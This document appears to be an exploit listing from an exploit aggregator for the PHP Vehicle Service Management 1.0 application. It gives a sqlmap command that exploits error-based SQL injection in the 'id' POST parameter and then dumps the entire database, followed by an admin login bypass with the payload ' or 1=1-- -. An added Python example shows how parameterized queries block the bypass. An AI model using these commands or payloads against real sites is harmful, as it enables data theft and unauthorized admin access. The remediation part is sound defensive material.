## https://sploitus.com/exploit?id=PACKETSTORM:164369
# Exploit Title: Vehicle Service Management 1.0 - SQL Injection Error Based  
# Date: 2021-10-02  
# Exploit Author: RICHARD JONES  
# Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code  
# Version: v1.0  
# Tested on: Windows 10  
  
Steps-To-Reproduce:  
Step 1 - Open sqlmap  
Step 2 - Enter the payload string for sqlmap (edit localhost to site address)  
Step 3 - Dump database info.  
  
  
SQLMAP Command:  
  
  
sqlmap -u "http://localhost/vehicle_service/classes/Master.php?f=save_request" --data "id=1&category_id=2&owner_name=aa&contact=aa&email=aaaa@a.com&address=aaaaaaaaa&vehicle_name=aaaa&vehicle_registration_number=aaaa&vehicle_model=aaaa&service_id[]=3&service_type=Pick+Up&pickup_address=aa" -p id --batch --technique=E  
  
Results:  
  
Parameter: id (POST)  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: id=1' AND (SELECT 8850 FROM(SELECT COUNT(*),CONCAT(0x716a706b71,(SELECT (ELT(8850=8850,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- bdrq&category_id=2&owner_name=aa&contact=aa&email=aaaa@a.com&address=aaaaaaaaa&vehicle_name=aaaa&vehicle_registration_number=aaaa&vehicle_model=aaaa&service_id[]=3&service_type=Pick Up&pickup_address=aa  
  
  
Step 3:  
  
Dump the entire database.  
  
sqlmap -u "http://localhost/vehicle_service/classes/Master.php?f=save_request" --data "id=1&category_id=2&owner_name=aa&contact=aa&email=aaaa@a.com&address=aaaaaaaaa&vehicle_name=aaaa&vehicle_registration_number=aaaa&vehicle_model=aaaa&service_id[]=3&service_type=Pick+Up&pickup_address=aa" -p id --batch --dump  
  
  
  
# Exploit Title: Vehicle Service Management 1.0 - SQL Authentication Bypass  
# Date: 2021-10-02  
# Exploit Author: RICHARD JONES  
# Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code  
# Version: v1.0  
# Tested on: Windows 10  
  
Steps-To-Reproduce:  
Step 1 - Go to http://site/admin/login.php (to login)  
Step 2 - Enter the payload below for username and password  
Step 3 - Login as admin!  
  
Payload:   
  
' or 1=1-- -  
  
# Profit
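
Both findings above (the injectable `id` POST parameter and the login bypass) come from request values being concatenated into SQL text, and the fix for both is to bind them as parameters. The following is an added example, not code from the application or the advisory: it uses Python with an in-memory SQLite table as a constructed stand-in for the PHP/MySQL login query, and the table, function names and credentials are hypothetical.

```python
import hashlib
import sqlite3

# Constructed fixed salt to keep the demo short; real systems use a per-user random salt.
DEMO_SALT = b"constructed-demo-salt"

def pw_hash(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), DEMO_SALT, 100_000).hex()

def make_db():
    """Constructed stand-in for the application's user table (SQLite, not MySQL)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("admin", pw_hash("constructed-admin-password")))
    return db

def login_concatenated(db, username, password):
    """Flawed pattern: request values are pasted into the SQL text."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND pw_hash = '" + pw_hash(password) + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_parameterized(db, username, password):
    """Fixed pattern: same query shape, but values are bound as data."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND pw_hash = ?",
        (username, pw_hash(password)),
    ).fetchone()
    return row[0] if row else None

def demo():
    db = make_db()
    payload = "' or 1=1-- -"  # the payload string quoted in the advisory
    return {
        "concatenated_payload": login_concatenated(db, payload, payload),
        "parameterized_payload": login_parameterized(db, payload, payload),
        "parameterized_valid": login_parameterized(db, "admin", "constructed-admin-password"),
        "parameterized_wrong_pw": login_parameterized(db, "admin", "wrong"),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

In the PHP application the equivalent change is a prepared statement through mysqli or PDO, with database error messages kept out of HTTP responses.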